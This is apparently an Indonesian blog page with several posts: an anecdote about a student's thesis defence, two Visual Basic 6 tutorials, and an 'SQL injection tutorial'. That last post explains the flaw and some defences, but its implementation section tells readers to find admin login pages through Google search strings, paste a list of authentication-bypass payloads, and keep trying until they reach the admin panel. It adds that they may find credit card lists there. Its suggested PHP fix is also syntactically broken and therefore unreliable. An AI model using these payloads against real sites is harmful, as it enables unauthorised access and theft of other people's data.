0 Seharusnya Mahasiswa Indonesia Seperti Ini

Hari ini, saya hadiahkan apresiasi tertinggi kepada seorang mahasiswi. Ia tampil sangat elegan menghadapi lima dosen penguji. Ia pertahankan karya ilimiahnya dengan penuh spirit, tiada ‘ketakutan’ yang tergambar di wajahnya. Iapun tak segan-segan minta pertanyaan diulangi kepada seorang professor. “Maaf Prof. Apa pertanyaannya boleh diulangi?”Tiada perlulah saya ceritakan bagaimana debat ilmiah itu dimulai. Saya terkesima saat sang professor berucap tegas: “Mestinya Anda merujuk ke teori yang ada”. Dengan sigap sang kandidat menjawab: “Saya jenuh dengan teori orang lain Prof. Saya justru ingin membuat teori”. 

Kian terkesima saya mendengar langsung sanggahan mahasiswiku ini.Saya amati, mahasiswi ini sangat ekspresif. Ia bangga ungkapkan apa yang dia inginkan. Calon sarjana ini sungguh memukau di mata saya. Pertama kalinya, saya sebagai penguji kagum dengan anak ini. Saya perhatikan, tak ada ucapan berlebihan dan subyektif akan jawaban-jawaban mahasiswi ini.Hari ini cita-cita saya tergapai, lama sudah saya rindukan sebuah ujian skripsi berlangsung debat ilmiah. Bukan sebuah formalitas yang membuat suasana ujian jauh dari atmosfir akademik. Skripsi adalah buatan murni seorang mahasiswa akhir. 

Saya sangat percaya, mahasiswi ini membuat skripsi dengan penuh naluri keilmuwan, roh skeptisnya terhadap sebuah perkembangan keilmuan benar-benar tampak dari hasil karya dalam penguasaannya. Potret ini sangat berbeda ekstrim jika seorang mahasiswa akhir yang skripsinya ‘dibuatkan’ orang lain. Wajahnya penuh ketegangan, ketakutan, dan terhantui rasa non akademis dan rasa bersalah.Hari ini, durasi ujian berlangsung alot dan menyita waktu dua jam. 

Bukan basa-basi, perdebatan benar-benar sarat keilmiahan. Bahkan ada penguji yang dibuatnya ‘grogi’, karena pemandangan ilmiah ini pertama terjadi di kampus ini. Apalagi setingkat ujian skripsi, yang identik dengan manut-manutnya seorang kandidat. Angguk-angguk kepala bukan sepenuhnya menunjukkan sebuah kesopanan tetapi tak lebih dari sebuah rasa takut ketidaklulusan alias UJIAN ULANG.Saya sering terheran-heran, seorang kandidat di ujian thesis malah tak sanggup mempertahankan karya ilmiahnya, padahal yang lebih menguasai thesis buatannya itu adalah dirinya sendiri. 

Bukan dosen penguji.Ketakutan apakah yang sebetulnya di diri setiap kandidat?. Sungguh saya sayangkan sebab ajang ujian skripsi, thesis, bahkan disertasi kadang menjadi momok non teknis, terjatuh bukan lantaran nuansa akademik tapi karena faktor lain yang di luar marka-marka akademik.

Di akhir ujian skripsi sang mahasiswi ini, kami berlima sebagai penguji melakukan rapat penentuan kelulusan/ketidaklulusan. Dimintalah sang mahasiswi ini berdiri di depan meja ujian. Sang profesor menyampaikan rekapitulasi hasil ujian, penuh ketegasan profesor ini membacanya: “Saudari kandidat. Setelah memperhatikan proses ujian, nilai dari setiap penguji serta sikap Saudari selama ujian berlangsung. Maka dengan ini, Saudari dinyatakan tidak lulus”.Pembacaan hasil keputusan ini tak membuat sang kandidat goyah, sedih, apalagi menangis. Ia malah berucap:

 “Terima kasih Prof. Saya tidak terima ketidaklulusan ini. Saya mohon tunjukkan dimana kesalahan jawaban saya sehingga nilai saya rendah. Jika terbukti secara ilmiah, jawaban saya salah. Saya terima hasil keputusan ketidaklulusan saya”.Sang profesor diam sejenak, beliau lalu berkata: “Andai semua mahasiswaku seperti Anda, sayalah orang yang paling bangga di dunia ini. Anda benar-benar memperjuangkan hak-hak akademik Anda. Budaya debat ilmiah dari Anda membuat saya kagum. Kami nyatakan Anda LULUS dengan Cum Laude

Read More »

0 KALKULATOR SEDERHANA (VB6)

Bismillah Hirohmannirohim.....

Newbie mau berbagi nih soal Visual Basic 6, sesuai judul di atas ane mau coba buat program sederhana yaitu kalkulator dari vb6,tak usah buanyak omong langsung ja..!!

Buat seperti gambar berikut !!

Propertiesnya !!

SourceCodenya !!

Private Sub cmdbagi_Click()
txthasil.Text = Val(txtnilai1.Text) / Val(txtnilai2.Text)
End Sub
Private Sub cmdhapus_Click()
txthasil.Text = Clear
txtnilai1.Text = Clear
txtnilai2.Text = Clear
End Sub
Private Sub cmdkali_Click()
txthasil.Text = Val(txtnilai1.Text) * Val(txtnilai2.Text)
End Sub
Private Sub cmdkeluar_Click()
End
End Sub
Private Sub cmdkurang_Click()
txthasil.Text = Val(txtnilai1.Text) - Val(txtnilai2.Text)
End Sub
Private Sub cmdtambah_Click()
txthasil.Text = Val(txtnilai1.Text) + Val(txtnilai2.Text)
End Sub

Coba anda Compile, taraaaaaaaaa....suksesssssssss
tutor by www.flyblinkz.tk

Read More »

0 OLE (Object Linking and Embedding)

OLE (Object Linking and Embedding) Drag-Drop adalah jenis drag-drop yang memungkinkan user untuk menyalin atau memindahkan data dari satu bagian ke bagian yang lain di dalam satu program atau
dengan program yang lain. Sebagian besar program-program buatan Microsoft (seperti Microsoft Office) ataupun perusahaan lain (seperti Adobe PhotoShop) mendukung penggunaan OLE drag-drop.


VB 6.0 menyediakan beberapa property, method dan event yang berhubungan dengan OLE drag-drop. Operasi OLE drag-drop melibatkan object source dan object target. Hanya beberapa komponen pada
VB 6.0 yang bisa digunakan sebagai object source maupun target, yaitu: TextBox, ComboBox, ListBox, Image, PictureBox, DirListBox dan FileListBox. Sedangkan komponen lainya hanya bisa digunakan
sebagai object target, seperti: CommandButton, CheckBox, OptionButton, Label dan Form.

Seting Objek sebagai berikut :
Objek : Properties :Value

Form : BorderStyle > 1-Fixed Single
Text1 : OLEDragMode > 1-Automatic
           OLEDragMode > 2-Automatic
           Text > (kosongkan)
Image1: OLEDragMode > 1-Automatic
             OLEDragMode > 2-Automatic
             Stretch > True

klik menu project > project 1 properties lalu tab General. Gantilah Startup Objeknya Menjadi nama Form yg anda buat.
buat teks dan gambar pada ms word.
jalankan program, lalu drag gambar atau teks dari ms word ke program...

suksessssssss....

Read More »

0 TUTORIAL SQL INJECTION

Pengertian SQL Injection
1) SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi client.
2) SQL Injection merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Sebab terjadinya SQL Injection
1) Tidak adanya penanganan terhadap karakter – karakter tanda petik satu ’ dan juga karakter double minus -- yang menyebabkan suatu aplikasi dapat disisipi dengan perintah SQL.
2) Sehingga seorang Hacker menyisipkan perintah SQL kedalam suatu parameter maupun suatu form.

Bug SQL Injection berbahaya ?
1) Teknik ini memungkinkan seseorang dapat login kedalam sistem tanpa harus memiliki account.
2) Selain itu SQL injection juga memungkinkan seseorang merubah, menghapus, maupun menambahkan data–data yang berada didalam database.
3) Bahkan yang lebih berbahaya lagi yaitu mematikan database itu sendiri, sehingga tidak bisa memberi layanan kepada web server.


Apa saja yang diperlukan untuk melakukan SQL Injection ?
1) Internet Exploler / Browser
2) PC yang terhubung internet
3) Program atau software seperti softice



Contoh sintaks SQL Injection
Contoh sintak SQL dalam PHP
1) $SQL = “select * from login where username =’$username’ and password = ‘$password’”; , {dari GET atau POST variable }
2) isikan password dengan string ’ or ’’ = ’
3) hasilnya maka SQL akan seperti ini = “select * from login where username = ’$username’ and password=’pass’ or ‘=′”; , { dengan SQL ini hasil selection akan selalu TRUE }
4) maka kita bisa inject sintax SQL (dalam hal ini OR) kedalam SQL

Gambar contoh SQL Injection


Contoh sintaks SQL Injection
1) Sintaks SQL string ‘-- setelah nama username
2) Query database awal :


Berubah menjadi :




Contoh sintaks SQL Injection
SQL Injection melalui URL, contohnya :


Penanganan SQL Injection
1) Merubah script php
2) Menggunakan MySQL_escape_string
3) Pemfilteran karakter ‘ dengan memodifikasi php.ini

1. Merubah script php
Contoh script php semula :
$query = "select id,name,email,password,type,block from user " .
"where email = '$Email' and password = '$Password'";
$hasil = mySQL_query($query, $id_mySQL);
while($row = mySQL_fetch_row($hasil))
{
$Id = $row[0];
$name = $row[1];
$email = $row[2];
$password = $row[3];
$type = $row[4];
$block = $row[5];
}
if(strcmp($block, 'yes') == 0)
{
echo "<script>alert('Your account has been blocked');
document.location.href='index.php';</script>\n";
exit();
}
else if(!empty($Id) && !empty($name) && !empty($email) && !empty($password));

Script diatas memungkinkan seseorang dapat login dengan menyisipkan perintah SQL kedalam form login. Ketika hacker menyisipkan karakter ’ or ’’ = ’ kedalam form email dan password maka akan terbentuk query sebagai berikut :

Maka dilakukan perubahan script menjadi :
$query = "select id,name,email,password,type,block from user".
"where email = '$Email'";
$hasil = mySQL_query($query, $id_mySQL);
while($row = mySQL_fetch_row($hasil))
{
$Id = $row[0];
$name = $row[1];
$email = $row[2];
$password = $row[3];
$type = $row[4];
$block = $row[5];
}
if(strcmp($block, 'yes') == 0)
{
echo "<script>alert('Your account has been blocked');
document.location.href='index.php';</script>\n";
exit();
}
$pass = md5($Password);
else if((strcmp($Email,$email) == 0) && strcmp($pass,$password) == 0));

2. Menggunakan MySQL_escape_string
Merubah string yang mengandung karakter ‘ menjadi \’ misal SQL injec’tion menjadi SQL injec\’tion
Contoh : $kar = “SQL injec’tion”;
$filter = mySQL_escape_string($kar);
echo”Hasil filter : $filter”;
Hasilnya :


3. Pemfilteran karakter ‘ dengan memodifikasi php.ini
Modifikasi dilakukan dengan mengenablekan variabel magic_quotes pada php.ini sehingga menyebabkan string maupun karakter ‘ diubah menjadi \’ secara otomatis oleh php
Contoh :


Contoh script yang membatasi karakter yang bisa masukkan :
function validatepassword( input )
good_password_chars =
"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
validatepassword = true
for i = 1 to len( input )
c = mid( input, i, 1 )
if ( InStr( good_password_chars, c ) = 0 ) then
validatepassword = false
exit function
end if
next
end function

Implementasi SQL Injection
1) Masuk ke google atau browse yg lain
2) Masukkan salah satu keyword berikut
"/admin.asp"
"/login.asp"
"/logon.asp"
"/adminlogin.asp"
"/adminlogon.asp"
"/admin_login.asp"
"/admin_logon.asp"
"/admin/admin.asp"
"/admin/login.asp"
"/admin/logon.asp"
{anda bisa menambahi sendiri sesuai keinginan anda}


3) Bukalah salah satu link yang ditemukan oleh google, kemungkinan Anda akan menjumpai sebuah halaman login (user name danpassword).
4) Masukkan kode berikut :
User name : ` or `a'='a
Password : ` or `a'='a (termasuk tanda petiknya)
5) Jika berhasil, kemungkinan Anda akan masuk ke admin panel, di mana Anda bisa menambahkan berita, mengedit user yang lain, merubah about,
dan lain-lain. Jika beruntung Anda bisa mendapatkan daftar kredit card yang banyak.
6) Jika tidak berhasil, cobalah mencari link yang lain yang ditemukan oleh google.
7) Banyak variasi kode yang mungkin, antara lain :
User name : admin
Password : ` or `a'='a
atau bisa dimasukkan ke dua–duanya misal :
‘ or 0=0 -- ; “ or 0=0 -- ; or 0=0 -- ; ‘ or 0=0 # ;
“ or 0=0 # ; ‘ or’x’=’x ; “ or “x”=”x ; ‘) or (‘x’=’x
Cobalah sampai berhasil hingga anda bisa masuk ke admin panel

Cara pencegahan SQL INJECTION
1) Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula akan bingung sejenak melihat input box nya gak bisa diinject dengan perintah yang panjang.
2) Filter input yang dimasukkan oleh user, terutama penggunaan tanda kutip tunggal (Input Validation).
3) Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan.
4) Matikan fasilitas-fasilitas standar seperti Stored Procedures, Extended Stored Procedures jika memungkinkan.
5) Ubah "Startup and run SQL Server" menggunakan low privilege user di SQL Server Security tab.


Hacking adalah seni. Hacking adalah perpaduan dari pengetahuan, kreatifitas dan kesabaran. Jika Anda memiliki ketiga-tiganya Anda akan berhasil.

sumber: http://ibc-forum.forumc.biz/t85-tutorial-sql-injection

Read More »